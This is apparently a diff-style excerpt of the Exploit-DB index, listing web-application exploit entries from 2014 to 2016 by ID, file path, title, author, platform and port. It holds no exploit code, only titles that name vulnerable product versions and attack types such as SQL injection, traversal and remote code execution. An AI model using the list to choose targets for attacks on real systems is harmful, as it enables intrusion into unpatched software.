+39320,exploits/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,webapps,php,80 +39441,exploits/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",webapps,multiple,4848 +39332,exploits/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php, +39333,exploits/php/webapps/39333.html,"WordPress Theme Elegance - '/elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",webapps,php, +39334,exploits/java/webapps/39334.txt,"Yealink VoIP Phones - '/servlet' HTTP Response Splitting",2014-06-12,"Jesus Oquendo",webapps,java, +39335,exploits/ios/webapps/39335.txt,"Secure Item Hub 1.0 iOS - Multiple Vulnerabilities",2016-01-27,Vulnerability-Lab,webapps,ios,8080 +39339,exploits/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",webapps,php,80 +39341,exploits/php/webapps/39341.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",webapps,php,80 +39342,exploits/php/webapps/39342.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",webapps,php,80 +39343,exploits/php/webapps/39343.txt,"OL-Commerce - '/OL-Commerce/affiliate_signup.php?a_country' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39344,exploits/php/webapps/39344.txt,"OL-Commerce - '/OL-Commerce/affiliate_show_banner.php?affiliate_banner_id' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39345,exploits/php/webapps/39345.txt,"OL-Commerce - '/OL-Commerce/create_account.php?country' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39346,exploits/php/webapps/39346.txt,"OL-Commerce - '/OL-Commerce/admin/create_account.php?entry_country_id' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39347,exploits/php/webapps/39347.txt,"Fonality trixbox - 'endpoint_generic.php' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39348,exploits/php/webapps/39348.txt,"Fonality trixbox - 'index.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39349,exploits/php/webapps/39349.txt,"Fonality trixbox - 'asterisk_info.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39350,exploits/php/webapps/39350.txt,"Fonality trixbox - 'repo.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39351,exploits/php/webapps/39351.txt,"Fonality trixbox - 'endpointcfg.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39352,exploits/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, +39354,exploits/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,webapps,php,80 +39355,exploits/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,webapps,php,80 +39356,exploits/hardware/webapps/39356.py,"NETGEAR WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",webapps,hardware,80 +39382,exploits/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,webapps,multiple, +39384,exploits/php/webapps/39384.txt,"WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,webapps,php, +39385,exploits/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",webapps,php,80 +39387,exploits/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution",2016-02-01,"Bikramaditya Guha",webapps,php,80 +39391,exploits/java/webapps/39391.txt,"Hippo CMS 10.1 - Multiple Vulnerabilities",2016-02-01,LiquidWorm,webapps,java,80 +39394,exploits/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,webapps,multiple,80 +39399,exploits/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",webapps,multiple, +39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80 +39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80 +39405,exploits/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,webapps,jsp,80 +39407,exploits/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,webapps,hardware, +39408,exploits/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware, +39409,exploits/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware, +39410,exploits/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",webapps,php,80 +39411,exploits/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",webapps,php,80 +39412,exploits/hardware/webapps/39412.txt,"NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",webapps,hardware, +39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80 +39414,exploits/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",webapps,php,80 +39415,exploits/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",webapps,php,80 +39416,exploits/php/webapps/39416.txt,"Symphony CMS 2.6.3 - Multiple SQL Injections",2016-02-04,"Sachin Wagh",webapps,php,80 +39418,exploits/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,webapps,java, +39419,exploits/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery",2016-02-08,hyp3rlinx,webapps,multiple, +39420,exploits/php/webapps/39420.txt,"WordPress Plugin User Meta Manager 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",webapps,php,80 +39421,exploits/php/webapps/39421.py,"WordPress Plugin WooCommerce Store Toolkit 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",webapps,php,80 +39422,exploits/php/webapps/39422.py,"WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload",2016-02-08,"Panagiotis Vagenas",webapps,php,80 +39423,exploits/php/webapps/39423.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",webapps,php,80 +39427,exploits/php/webapps/39427.txt,"Employee TimeClock Software 0.99 - SQL Injection",2010-03-10,"Secunia Research",webapps,php, +39435,exploits/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure",2016-02-10,Vulnerability-Lab,webapps,multiple, +39436,exploits/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",webapps,php,80 +39448,exploits/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",webapps,php,80 +39449,exploits/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",webapps,multiple, +39450,exploits/multiple/webapps/39450.txt,"ManageEngine Network Configuration Management Build 11000 - Privilege Escalation",2016-02-16,"Kaustubh G. Padwad",webapps,multiple, +39451,exploits/php/webapps/39451.txt,"WordPress Plugin ALO EasyMail NewsLetter 2.6.01 - Cross-Site Request Forgery",2016-02-16,"Mohsen Lotfi",webapps,php,80 +39453,exploits/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / Cross-Site Request Forgery",2016-02-16,hyp3rlinx,webapps,php, +39456,exploits/multiple/webapps/39456.rb,"JMX2 Email Tester - 'save_email.php' Arbitrary File Upload",2016-02-17,HaHwul,webapps,multiple, +39459,exploits/php/webapps/39459.txt,"Redaxo 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",webapps,php,80 +39458,exploits/php/webapps/39458.txt,"OCS Inventory NG 2.2 - SQL Injection",2016-02-17,Ephreet,webapps,php, +39468,exploits/php/webapps/39468.txt,"Vesta Control Panel 0.9.8-15 - Persistent Cross-Site Scripting",2016-02-18,"Necmettin COSKUN",webapps,php, +39469,exploits/php/webapps/39469.txt,"DirectAdmin 1.491 - Cross-Site Request Forgery",2016-02-18,"Necmettin COSKUN",webapps,php, +39473,exploits/php/webapps/39473.txt,"Chamilo LMS IDOR - 'messageId' Delete POST Injection",2016-02-19,Vulnerability-Lab,webapps,php, +39474,exploits/php/webapps/39474.txt,"Chamilo LMS - Persistent Cross-Site Scripting",2016-02-19,Vulnerability-Lab,webapps,php, +39477,exploits/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",webapps,windows,8500 +39478,exploits/php/webapps/39478.txt,"SOLIDserver < 5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",webapps,php, +39481,exploits/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,webapps,java, +39485,exploits/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",webapps,asp,80 +39486,exploits/windows/webapps/39486.txt,"Dell OpenManage Server Administrator 8.2 - Authenticated Directory Traversal",2016-02-23,hantwister,webapps,windows, +39488,exploits/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",webapps,json,8443 +39489,exploits/php/webapps/39489.py,"WordPress Plugin Extra User Details 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",webapps,php,80 +39495,exploits/windows/webapps/39495.py,"IBM Lotus Domino R8 - Password Hash Extraction",2016-02-25,"Jonathan Broche",webapps,windows, +39497,exploits/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,webapps,ashx, +39498,exploits/php/webapps/39498.txt,"WordPress Plugin Ocim MP3 - SQL Injection",2016-02-26,"xevil & Blankon33",webapps,php,80 +39500,exploits/linux/webapps/39500.txt,"Zimbra 8.0.9 GA - Cross-Site Request Forgery",2016-02-26,Sysdream,webapps,linux,443 +39501,exploits/php/webapps/39501.txt,"Centreon 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,webapps,php, +39506,exploits/php/webapps/39506.txt,"Joomla! Component com_poweradmin 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",webapps,php,80 +39507,exploits/php/webapps/39507.txt,"WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",webapps,php,80 +39513,exploits/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",webapps,php,80 +39521,exploits/php/webapps/39521.txt,"WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",webapps,php,80 +39524,exploits/php/webapps/39524.js,"ATutor LMS - '/install_modules.php' Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,webapps,php, +39526,exploits/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,webapps,php,80 +39534,exploits/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",webapps,php,80 +39536,exploits/php/webapps/39536.txt,"WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",webapps,php,80 +39547,exploits/php/webapps/39547.txt,"WordPress Plugin Best Web Soft Captcha 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",webapps,php,80 +39548,exploits/php/webapps/39548.txt,"WordPress Plugin WP Advanced Comment 0.10 - Persistent Cross-Site Scripting",2016-03-10,"Mohammad Khaleghi",webapps,php,80 +39552,exploits/php/webapps/39552.txt,"WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",webapps,php,80 +39553,exploits/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",webapps,php,80 +39558,exploits/php/webapps/39558.txt,"WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion",2016-03-14,Wadeek,webapps,php,80 +39559,exploits/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",webapps,php,80 +39564,exploits/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,webapps,perl,443 +39626,exploits/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent Cross-Site Scripting",2016-03-28,"Sarim Kiani",webapps,multiple,80 +39572,exploits/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",webapps,php,80 +39573,exploits/windows/webapps/39573.txt,"Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",webapps,windows, +39575,exploits/php/webapps/39575.txt,"WordPress Plugin eBook Download 1.1 - Directory Traversal",2016-03-21,Wadeek,webapps,php,80 +39576,exploits/php/webapps/39576.txt,"WordPress Plugin Import CSV 1.0 - Directory Traversal",2016-03-21,Wadeek,webapps,php,80 +39577,exploits/php/webapps/39577.txt,"WordPress Plugin Abtest - Local File Inclusion",2016-03-21,CrashBandicot,webapps,php,80 +39580,exploits/php/webapps/39580.txt,"Disc ORGanizer (DORG) - Multiple Vulnerabilities",2016-03-21,SECUPENT,webapps,php,80 +39581,exploits/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",webapps,hardware,80 +39582,exploits/php/webapps/39582.txt,"Xoops 2.5.7.2 - Cross-Site Request Forgery (Arbitrary User Deletions)",2016-03-21,hyp3rlinx,webapps,php,80 +39583,exploits/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,webapps,php,80 +39584,exploits/php/webapps/39584.txt,"WordPress Plugin Image Export 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,webapps,php,80 +39586,exploits/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",webapps,php,80 +39587,exploits/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",webapps,php,80 +39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80 +39589,exploits/php/webapps/39589.txt,"WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,webapps,php,80 +39590,exploits/php/webapps/39590.txt,"Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",webapps,php,80 +39591,exploits/php/webapps/39591.txt,"WordPress Plugin Brandfolder 3.0 - Local/Remote File Inclusion",2016-03-22,AMAR^SHG,webapps,php,80 +39592,exploits/php/webapps/39592.txt,"WordPress Plugin Dharma Booking 2.38.3 - Remote File Inclusion",2016-03-22,AMAR^SHG,webapps,php,80 +39593,exploits/php/webapps/39593.txt,"WordPress Plugin Memphis Document Library 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",webapps,php,80 +39597,exploits/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",webapps,multiple,80 +39621,exploits/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,webapps,php,80 +39622,exploits/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8/3.7 - Cross-Site Request Forgery",2016-03-27,hyp3rlinx,webapps,hardware,80 +39623,exploits/php/webapps/39623.txt,"WordPress Plugin Photocart Link 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,webapps,php,80 +39637,exploits/php/webapps/39637.txt,"CubeCart 6.0.10 - Multiple Vulnerabilities",2016-03-30,"High-Tech Bridge SA",webapps,php,80 +39641,exploits/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin)",2016-03-31,LiquidWorm,webapps,hardware,80 +39642,exploits/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal",2016-03-31,"Andreas Lindh",webapps,linux,5080 +39646,exploits/php/webapps/39646.py,"WordPress Plugin Advanced Video 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",webapps,php,80 +40046,exploits/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein & Viktor Minin",webapps,php,80 +39659,exploits/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2/6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,webapps,hardware, +39664,exploits/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,webapps,jsp,7272 +39667,exploits/jsp/webapps/39667.txt,"Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities",2016-04-06,LiquidWorm,webapps,jsp,80 +39668,exploits/php/webapps/39668.txt,"SocialEngine 4.8.9 - SQL Injection",2016-04-06,"High-Tech Bridge SA",webapps,php,80 +39672,exploits/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,webapps,hardware,443 +39676,exploits/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,webapps,php,443 +39677,exploits/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,webapps,hardware,80 +39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80 +39679,exploits/php/webapps/39679.txt,"OpenCart 2.1.0.2 < 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",webapps,php,80 +39968,exploits/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,webapps,windows,1947 +39682,exploits/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",webapps,php,80 +39683,exploits/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,webapps,hardware,80 +39687,exploits/jsp/webapps/39687.txt,"Novell ServiceDesk 6.5/7.0.3/7.1.0 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",webapps,jsp, +39688,exploits/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,webapps,php,80 +39691,exploits/jsp/webapps/39691.py,"Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload",2016-04-13,"Zhou Yu",webapps,jsp,8088 +39695,exploits/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery",2016-04-14,"Aatif Shahdad",webapps,php,443 +39696,exploits/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,webapps,hardware,80 +39697,exploits/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",webapps,php,80 +39701,exploits/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,webapps,cgi,443 +39704,exploits/php/webapps/39704.txt,"WordPress Plugin leenk.me 2.5.0 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,webapps,php,80 +39705,exploits/php/webapps/39705.txt,"WordPress Plugin Kento Post View Counter 2.8 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,webapps,php,80 +39707,exploits/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",webapps,php,80 +39709,exploits/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,webapps,php,443 +39710,exploits/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",webapps,php,80 +39711,exploits/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,webapps,php,80 +39714,exploits/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",webapps,php,80 +39715,exploits/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",webapps,java,443 +39716,exploits/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",webapps,hardware,443 +39720,exploits/jsp/webapps/39720.txt,"Totemomail 4.x/5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,webapps,jsp, +39721,exploits/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,webapps,ios, +39725,exploits/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",webapps,hardware,443 +39726,exploits/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 'sysconf.cgi' Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",webapps,hardware,443 +39730,exploits/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,webapps,ruby,443 +39737,exploits/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",webapps,php,80 +39738,exploits/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",webapps,multiple,58080 +39739,exploits/hardware/webapps/39739.py,"RomPager 4.34 (Multiple Router Vendors) - 'Misfortune Cookie' Authentication Bypass",2016-04-27,"Milad Doorbash",webapps,hardware, +39744,exploits/php/webapps/39744.html,"Observium 0.16.7533 - Cross-Site Request Forgery",2016-04-29,"Dolev Farhi",webapps,php,80 +39745,exploits/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",webapps,php,80 +39746,exploits/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,webapps,cgi,80 +39751,exploits/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",webapps,php,80 +39752,exploits/php/webapps/39752.txt,"WordPress Plugin Ghost 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",webapps,php,80 +39759,exploits/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",webapps,php,80 +39760,exploits/php/webapps/39760.txt,"CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",webapps,php,80 +39761,exploits/php/webapps/39761.txt,"WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",webapps,php,80 +39762,exploits/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",webapps,cgi,80 +39765,exploits/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",webapps,cgi, +39766,exploits/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,webapps,php, +39777,exploits/asp/webapps/39777.txt,"DotNetNuke 07.04.00 - Administration Authentication Bypass",2016-05-06,"Marios Nicolaides",webapps,asp,80 +39780,exploits/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",webapps,jsp,443 +39781,exploits/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,webapps,php,80 +39784,exploits/php/webapps/39784.txt,"ZeewaysCMS - Multiple Vulnerabilities",2016-05-09,"Bikramaditya Guha",webapps,php,80 +39798,exploits/hardware/webapps/39798.txt,"JVC HDRs / Net (Multiple Cameras) - Multiple Vulnerabilities",2016-05-10,Orwelllabs,webapps,hardware,80 +39806,exploits/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",webapps,php,80 +39807,exploits/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",webapps,php,80 +39808,exploits/windows/webapps/39808.txt,"Trend Micro - 'CoreServiceShell.exe' Multiple HTTP s",2016-05-12,"Google Security Research",webapps,windows,37848 +39883,exploits/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,webapps,php,80 +39813,exploits/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",webapps,php,80 +39816,exploits/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,webapps,php, +39817,exploits/php/webapps/39817.php,"Web Interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,webapps,php, +39821,exploits/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",webapps,python, +39822,exploits/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",webapps,multiple, +39837,exploits/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,webapps,java, +39838,exploits/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize / Arbitrary Write File",2016-05-18,agix,webapps,php,80 +39840,exploits/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection",2016-05-19,ERPScan,webapps,xml, +39841,exploits/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Information Disclosure",2016-05-19,ERPScan,webapps,xml, +39848,exploits/php/webapps/39848.py,"WordPress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",webapps,php,80 +39849,exploits/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",webapps,php,443 +39850,exploits/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection",2016-05-24,"Mehmet Ince",webapps,asp,80 +39855,exploits/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",webapps,php,80 +39856,exploits/php/webapps/39856.txt,"EduSec 4.2.5 - SQL Injection",2016-05-26,"Bikramaditya Guha",webapps,php,80 +39864,exploits/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",webapps,php,80 +40059,exploits/php/webapps/40059.txt,"CIMA DocuClass ECM - Multiple Vulnerabilities",2016-07-06,"Karn Ganeshen",webapps,php,80 +39868,exploits/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",webapps,php,80 +39870,exploits/php/webapps/39870.html,"Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-05-31,LiquidWorm,webapps,php,80 